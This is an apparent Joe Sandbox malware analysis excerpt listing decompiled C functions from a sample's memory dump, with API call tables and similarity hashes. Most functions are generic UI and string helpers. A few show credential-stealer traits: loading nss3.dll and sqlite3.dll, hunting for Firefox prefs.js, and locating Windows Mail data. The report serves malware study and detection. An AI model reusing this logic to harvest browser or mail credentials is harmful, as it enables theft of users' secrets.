                                                              					E004062AD( &_v268, _a4, "sqlite3.dll");
                                                              				}
                                                              				_t16 = E0040614B( &_v268);
                                                              				asm("sbb eax, eax");
                                                              				return  ~( ~_t16);
                                                              			}







                                                              0x0040f3d5
                                                              0x0040f3dc
                                                              0x0040f3e4
                                                              0x0040f3f6
                                                              0x0040f3ff
                                                              0x0040f414
                                                              0x0040f401
                                                              0x0040f40b
                                                              0x0040f411
                                                              0x0040f422
                                                              0x0040f42b
                                                              0x0040f432

                                                              APIs
                                                              • memset.MSVCRT ref: 0040F3DC
                                                              • strlen.MSVCRT ref: 0040F3E4
                                                              • strlen.MSVCRT ref: 0040F3F1
                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strlen$memsetstrcatstrcpy
                                                              • String ID: sqlite3.dll
                                                              • API String ID: 1581230619-1155512374
                                                              • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                              • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                              • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                              • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				void _v515;
                                                              				char _v516;
                                                              				void* __esi;
                                                              				void* _t15;
                                                              				intOrPtr* _t24;
                                                              				char* _t26;
                                                              
                                                              				_t24 = __ecx;
                                                              				_v260 = 0;
                                                              				memset( &_v259, 0, 0xfe);
                                                              				_v516 = 0;
                                                              				memset( &_v515, 0, 0xfe);
                                                              				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                                              				_t26 =  &_v260;
                                                              				E00409018(_t26, _t15);
                                                              				sprintf( &_v516, "</%s>\r\n", _t26);
                                                              				return E00405EFD(_a4,  &_v516);
                                                              			}











                                                              0x0040990e
                                                              0x00409910
                                                              0x00409917
                                                              0x00409926
                                                              0x0040992d
                                                              0x00409939
                                                              0x0040993d
                                                              0x00409943
                                                              0x00409957
                                                              0x00409971

                                                              APIs
                                                              • memset.MSVCRT ref: 00409917
                                                              • memset.MSVCRT ref: 0040992D
                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                              • sprintf.MSVCRT ref: 00409957
                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                              • String ID: </%s>
                                                              • API String ID: 3202206310-259020660
                                                              • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                              • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                              • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                              • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406734(char* __edi, char* _a4) {
                                                              				char* _t12;
                                                              				int _t13;
                                                              
                                                              				_t12 = __edi;
                                                              				_t13 = strlen(__edi);
                                                              				if(strlen(_a4) + _t13 < 0x104) {
                                                              					_t2 =  &_a4; // 0x410d64
                                                              					strcat(_t13 + __edi,  *_t2);
                                                              				}
                                                              				return _t12;
                                                              			}





                                                              0x00406734
                                                              0x0040673f
                                                              0x0040674f
                                                              0x00406751
                                                              0x00406758
                                                              0x0040675e
                                                              0x00406762

                                                              APIs
                                                              • strlen.MSVCRT ref: 00406736
                                                              • strlen.MSVCRT ref: 00406741
                                                              • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strlen$strcat
                                                              • String ID: dA
                                                              • API String ID: 2335785903-82490789
                                                              • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                              • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                              • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                              • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 89%
                                                              			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
                                                              				void* __ebx;
                                                              				intOrPtr _t22;
                                                              				void* _t23;
                                                              				void* _t25;
                                                              				void* _t27;
                                                              				void* _t29;
                                                              				void* _t32;
                                                              				void* _t36;
                                                              				signed short _t42;
                                                              				char* _t47;
                                                              				void* _t48;
                                                              				intOrPtr _t49;
                                                              				intOrPtr _t50;
                                                              				void* _t57;
                                                              
                                                              				_t22 = _a4;
                                                              				_t57 = _t22 - 6;
                                                              				_t47 = _a8;
                                                              				_t48 = __ecx;
                                                              				 *_t47 = 0;
                                                              				if(_t57 > 0) {
                                                              					_t23 = _t22 - 7;
                                                              					if(_t23 == 0) {
                                                              						return __ecx + 0x214;
                                                              					}
                                                              					_t25 = _t23 - 1;
                                                              					if(_t25 == 0) {
                                                              						return __ecx + 0x294;
                                                              					}
                                                              					_t27 = _t25 - 1;
                                                              					if(_t27 == 0) {
                                                              						return __ecx + 0x314;
                                                              					}
                                                              					_t29 = _t27 - 1;
                                                              					if(_t29 == 0) {
                                                              						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
                                                              						if(_t49 < 1 || _t49 > 7) {
                                                              							if(_t49 < 8 || _t49 > 0xe) {
                                                              								if(_t49 < 0xf || _t49 > 0x19) {
                                                              									if(_t49 < 0x1a || _t49 > 0x2d) {
                                                              										if(_t49 < 0x2e) {
                                                              											L16:
                                                              											return _t47;
                                                              										}
                                                              										_t42 = 0x519;
                                                              									} else {
                                                              										_t42 = 0x518;
                                                              									}
                                                              								} else {
                                                              									_t42 = 0x517;
                                                              								}
                                                              							} else {
                                                              								_t42 = 0x516;
                                                              							}
                                                              							goto L20;
                                                              						} else {
                                                              							_t42 = 0x515;
                                                              							L20:
                                                              							return E004078FF(_t42);
                                                              						}
                                                              					}
                                                              					_t32 = _t29 - 1;
                                                              					if(_t32 == 0) {
                                                              						return __ecx + 0x190;
                                                              					}
                                                              					if(_t32 != 1) {
                                                              						goto L16;
                                                              					}
                                                              					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
                                                              					L14:
                                                              					if(_t50 != 0) {
                                                              						_push(0xa);
                                                              						_push(_t47);
                                                              						_push(_t50);
                                                              						L0041158E();
                                                              					}
                                                              					goto L16;
                                                              				}
                                                              				if(_t57 == 0) {
                                                              					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
                                                              					goto L20;
                                                              				}
                                                              				if(_t22 == 0xfffffff6) {
                                                              					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
                                                              					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
                                                              					goto L16;
                                                              				}
                                                              				if(_t22 == 0) {
                                                              					return __ecx + 0xc;
                                                              				}
                                                              				if(_t22 == 1) {
                                                              					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
                                                              					goto L20;
                                                              				}
                                                              				if(_t22 == 2) {
                                                              					return __ecx + 0x90;
                                                              				}
                                                              				if(_t22 == 3) {
                                                              					return __ecx + 0x110;
                                                              				}
                                                              				if(_t22 == 4) {
                                                              					_t50 =  *((intOrPtr*)(__ecx + 0x394));
                                                              					goto L14;
                                                              				}
                                                              				if(_t22 != 5) {
                                                              					goto L16;
                                                              				}
                                                              				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
                                                              					_push(0x10);
                                                              				} else {
                                                              					_push(0xf);
                                                              				}
                                                              				_pop(_t42);
                                                              				goto L20;
                                                              			}

















                                                              0x00402221
                                                              0x00402225
                                                              0x0040222b
                                                              0x0040222f
                                                              0x00402231
                                                              0x00402234
                                                              0x00402312
                                                              0x00402315
                                                              0x00000000
                                                              0x004023c2
                                                              0x0040231b
                                                              0x0040231c
                                                              0x00000000
                                                              0x004023ba
                                                              0x00402322
                                                              0x00402323
                                                              0x00000000
                                                              0x004023b2
                                                              0x00402329
                                                              0x0040232a
                                                              0x00402349
                                                              0x00402352
                                                              0x00402366
                                                              0x0040237a
                                                              0x0040238e
                                                              0x004023a2
                                                              0x0040228e
                                                              0x00000000
                                                              0x0040228e
                                                              0x004023a8
                                                              0x00402395
                                                              0x00402395
                                                              0x00402395
                                                              0x00402381
                                                              0x00402381
                                                              0x00402381
                                                              0x0040236d
                                                              0x0040236d
                                                              0x0040236d
                                                              0x00000000
                                                              0x00402359
                                                              0x00402359
                                                              0x004022b7
                                                              0x00000000
                                                              0x004022b7
                                                              0x00402352
                                                              0x0040232c
                                                              0x0040232d
                                                              0x00000000
                                                              0x00402341
                                                              0x00402330
                                                              0x00000000
                                                              0x00000000
                                                              0x00402336
                                                              0x0040227e
                                                              0x00402280
                                                              0x00402282
                                                              0x00402284
                                                              0x00402285
                                                              0x00402286
                                                              0x0040228b
                                                              0x00000000
                                                              0x00402280
                                                              0x0040223a
                                                              0x0040230a
                                                              0x00000000
                                                              0x0040230a
                                                              0x00402243
                                                              0x004022d5
                                                              0x004022fa
                                                              0x00000000
                                                              0x004022ff
                                                              0x0040224b
                                                              0x00000000
                                                              0x004022c1
                                                              0x00402250
                                                              0x004022b1
                                                              0x00000000
                                                              0x004022b1
                                                              0x00402255
                                                              0x00000000
                                                              0x004022a0
                                                              0x0040225a
                                                              0x00000000
                                                              0x00402295
                                                              0x0040225f
                                                              0x00402278
                                                              0x00000000
                                                              0x00402278
                                                              0x00402264
                                                              0x00000000
                                                              0x00000000
                                                              0x0040226d
                                                              0x00402274
                                                              0x0040226f
                                                              0x0040226f
                                                              0x0040226f
                                                              0x00402271
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _ultoasprintf
                                                              • String ID: %s %s %s
                                                              • API String ID: 432394123-3850900253
                                                              • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                              • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                              • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                              • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 89%
                                                              			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                              				char _v328;
                                                              				char _v652;
                                                              				char _v928;
                                                              				char _v1296;
                                                              				signed int _v1300;
                                                              				void* __esi;
                                                              				char* _t26;
                                                              				intOrPtr* _t43;
                                                              
                                                              				_v1300 = _v1300 | 0xffffffff;
                                                              				_v1296 = 0;
                                                              				_v328 = 0;
                                                              				_v652 = 0;
                                                              				_t43 = __ecx;
                                                              				E00406E68( &_v1300, __eflags, "*.*", _a4);
                                                              				while(E00406EC3( &_v1300) != 0) {
                                                              					__eflags = E00406E2D( &_v1300);
                                                              					if(__eflags == 0) {
                                                              						__eflags = _a8 - 1;
                                                              						if(_a8 > 1) {
                                                              							_t26 =  &_v928;
                                                              							_push("prefs.js");
                                                              							_push(_t26);
                                                              							L004115B2();
                                                              							__eflags = _t26;
                                                              							if(_t26 == 0) {
                                                              								__eflags = E0040614B( &_v652);
                                                              								if(__eflags != 0) {
                                                              									E0040D1EC(_t43, __eflags,  &_v652);
                                                              								}
                                                              							}
                                                              						}
                                                              					} else {
                                                              						_a8 = _a8 + 1;
                                                              						E0040D37A(_t43, __eflags,  &_v652, _a8);
                                                              					}
                                                              				}
                                                              				E00406F5B( &_v1300);
                                                              				return 1;
                                                              			}











                                                              0x0040d386
                                                              0x0040d391
                                                              0x0040d395
                                                              0x0040d39c
                                                              0x0040d3ac
                                                              0x0040d3ae
                                                              0x0040d418
                                                              0x0040d3be
                                                              0x0040d3c0
                                                              0x0040d3d9
                                                              0x0040d3dd
                                                              0x0040d3df
                                                              0x0040d3e6
                                                              0x0040d3eb
                                                              0x0040d3ec
                                                              0x0040d3f1
                                                              0x0040d3f5
                                                              0x0040d404
                                                              0x0040d407
                                                              0x0040d413
                                                              0x0040d413
                                                              0x0040d407
                                                              0x0040d3f5
                                                              0x0040d3c2
                                                              0x0040d3c2
                                                              0x0040d3d2
                                                              0x0040d3d2
                                                              0x0040d3c0
                                                              0x0040d429
                                                              0x0040d435

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strlen$FileFindFirst
                                                              • String ID: *.*$prefs.js
                                                              • API String ID: 2516927864-1592826420
                                                              • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                              • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                              • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                              • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				signed int _v36;
                                                              				signed int _v44;
                                                              				intOrPtr _v48;
                                                              				char* _v52;
                                                              				intOrPtr _v56;
                                                              				signed int _v64;
                                                              				intOrPtr _v68;
                                                              				intOrPtr _v76;
                                                              				struct tagOFNA _v80;
                                                              				intOrPtr _t23;
                                                              				intOrPtr* _t33;
                                                              				intOrPtr _t34;
                                                              				char* _t38;
                                                              
                                                              				_t38 = __edi;
                                                              				_t34 = __ecx;
                                                              				_t33 = __ebx;
                                                              				_t23 = 1;
                                                              				if(__ebx != 0) {
                                                              					_t23 =  *__ebx;
                                                              				}
                                                              				_v64 = _v64 & 0x00000000;
                                                              				_v44 = _v44 & 0x00000000;
                                                              				_v36 = _v36 & 0x00000000;
                                                              				_v56 = _t23;
                                                              				_v32 = _a8;
                                                              				_v20 = _a12;
                                                              				_v76 = _t34;
                                                              				_v80 = 0x4c;
                                                              				_v68 = _a4;
                                                              				_v52 = _t38;
                                                              				_v48 = 0x104;
                                                              				_v28 = 0x80806;
                                                              				if(GetSaveFileNameA( &_v80) == 0) {
                                                              					return 0;
                                                              				} else {
                                                              					if(_t33 != 0) {
                                                              						 *_t33 = _v56;
                                                              					}
                                                              					strcpy(_t38, _v52);
                                                              					return 1;
                                                              				}
                                                              			}



















                                                              0x00406680
                                                              0x00406680
                                                              0x00406680
                                                              0x00406688
                                                              0x0040668b
                                                              0x0040668d
                                                              0x0040668d
                                                              0x0040668f
                                                              0x00406693
                                                              0x00406697
                                                              0x0040669b
                                                              0x004066a1
                                                              0x004066a7
                                                              0x004066aa
                                                              0x004066b4
                                                              0x004066bb
                                                              0x004066be
                                                              0x004066c1
                                                              0x004066c8
                                                              0x004066d7
                                                              0x004066f5
                                                              0x004066d9
                                                              0x004066db
                                                              0x004066e0
                                                              0x004066e0
                                                              0x004066e6
                                                              0x004066f1
                                                              0x004066f1

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileNameSavestrcpy
                                                              • String ID: L
                                                              • API String ID: 1182090483-2909332022
                                                              • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                              • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                              • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                              • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040ADB3(void* __ebx, void* __eflags) {
                                                              				char _v265;
                                                              				char _v526;
                                                              				char _v787;
                                                              				void _v1048;
                                                              				void _v3648;
                                                              				intOrPtr _v3652;
                                                              				char _v3660;
                                                              				void* _t30;
                                                              
                                                              				_t30 = __ebx;
                                                              				_v3660 = 0x41300c;
                                                              				memset( &_v3648, 0, 0x10);
                                                              				_v1048 = 0;
                                                              				_v787 = 0;
                                                              				_v526 = 0;
                                                              				_v265 = 0;
                                                              				_v3652 = 0x6c;
                                                              				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
                                                              				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
                                                              					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
                                                              				}
                                                              				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
                                                              				return E0040143D( &_v3660);
                                                              			}











                                                              0x0040adb3
                                                              0x0040adc9
                                                              0x0040add3
                                                              0x0040ade7
                                                              0x0040adee
                                                              0x0040adf5
                                                              0x0040adfc
                                                              0x0040ae03
                                                              0x0040ae1e
                                                              0x0040ae2d
                                                              0x0040ae4a
                                                              0x0040ae4a
                                                              0x0040ae5b
                                                              0x0040ae6f

                                                              APIs
                                                              • memset.MSVCRT ref: 0040ADD3
                                                              • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FocusMessagePostmemset
                                                              • String ID: l
                                                              • API String ID: 3436799508-2517025534
                                                              • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                              • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                              • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                              • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00408441(void** __esi, struct HWND__* _a4) {
                                                              				long _v12;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				short _v32;
                                                              				void* _v40;
                                                              				long _t17;
                                                              				short* _t23;
                                                              				int _t24;
                                                              				void** _t25;
                                                              
                                                              				_t25 = __esi;
                                                              				_t24 = 0;
                                                              				if(_a4 != 0) {
                                                              					_t17 = memset( *__esi, 0, __esi[1] << 2);
                                                              					if(__esi[1] > 0) {
                                                              						do {
                                                              							_v28 = _v28 & 0x00000000;
                                                              							_v24 = _v24 & 0x00000000;
                                                              							_t23 =  *_t25 + _t24 * 4;
                                                              							_v40 = 0x22;
                                                              							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
                                                              							if(_t17 != 0) {
                                                              								 *_t23 = _v32;
                                                              								_t17 = _v12;
                                                              								 *(_t23 + 2) = _t17;
                                                              							}
                                                              							_t24 = _t24 + 1;
                                                              						} while (_t24 < _t25[1]);
                                                              					}
                                                              				}
                                                              				return _t17;
                                                              			}












                                                              0x00408441
                                                              0x00408449
                                                              0x0040844e
                                                              0x0040845a
                                                              0x00408465
                                                              0x00408467
                                                              0x00408469
                                                              0x0040846d
                                                              0x00408471
                                                              0x00408481
                                                              0x00408488
                                                              0x00408490
                                                              0x00408496
                                                              0x00408499
                                                              0x0040849d
                                                              0x0040849d
                                                              0x004084a1
                                                              0x004084a2
                                                              0x00408467
                                                              0x00408465
                                                              0x004084aa

                                                              APIs
                                                              • memset.MSVCRT ref: 0040845A
                                                              • SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: "
                                                              • API String ID: 568519121-123907689
                                                              • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                              • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                              • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                              • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				intOrPtr _v44;
                                                              				intOrPtr _v48;
                                                              				char* _v52;
                                                              				intOrPtr _v56;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				intOrPtr _v76;
                                                              				struct tagOFNA _v80;
                                                              
                                                              				_v76 = __eax;
                                                              				_v68 = _a4;
                                                              				_v64 = 0;
                                                              				_v44 = 0;
                                                              				_v36 = 0;
                                                              				_v32 = _a8;
                                                              				_v80 = 0x4c;
                                                              				_v56 = 1;
                                                              				_v52 = __esi;
                                                              				_v48 = 0x104;
                                                              				_v28 = 0x81804;
                                                              				_v20 = 0x413008;
                                                              				if(GetOpenFileNameA( &_v80) == 0) {
                                                              					return 0;
                                                              				} else {
                                                              					strcpy(__esi, _v52);
                                                              					return 1;
                                                              				}
                                                              			}















                                                              0x0040661e
                                                              0x00406624
                                                              0x00406629
                                                              0x0040662c
                                                              0x0040662f
                                                              0x00406635
                                                              0x0040663c
                                                              0x00406643
                                                              0x0040664a
                                                              0x0040664d
                                                              0x00406654
                                                              0x0040665b
                                                              0x0040666a
                                                              0x0040667f
                                                              0x0040666c
                                                              0x00406670
                                                              0x0040667b
                                                              0x0040667b

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileNameOpenstrcpy
                                                              • String ID: L
                                                              • API String ID: 812585365-2909332022
                                                              • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                              • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                              • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                              • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadMenuA.USER32 ref: 00407BC1
                                                              • sprintf.MSVCRT ref: 00407BE4
                                                                • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                                • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                                • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                                • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                                • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                                • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                                • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                              • String ID: menu_%d
                                                              • API String ID: 3671758413-2417748251
                                                              • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                              • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                              • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                              • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406325(char* _a4) {
                                                              
                                                              				if( *0x417550 == 0) {
                                                              					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
                                                              				}
                                                              				strcpy(_a4, 0x417550);
                                                              				return  *0x417658;
                                                              			}



                                                              0x00406332
                                                              0x00406340
                                                              0x00406340
                                                              0x0040634a
                                                              0x00406357

                                                              APIs
                                                              • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                              • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                              Strings
                                                              Memory Dump Source
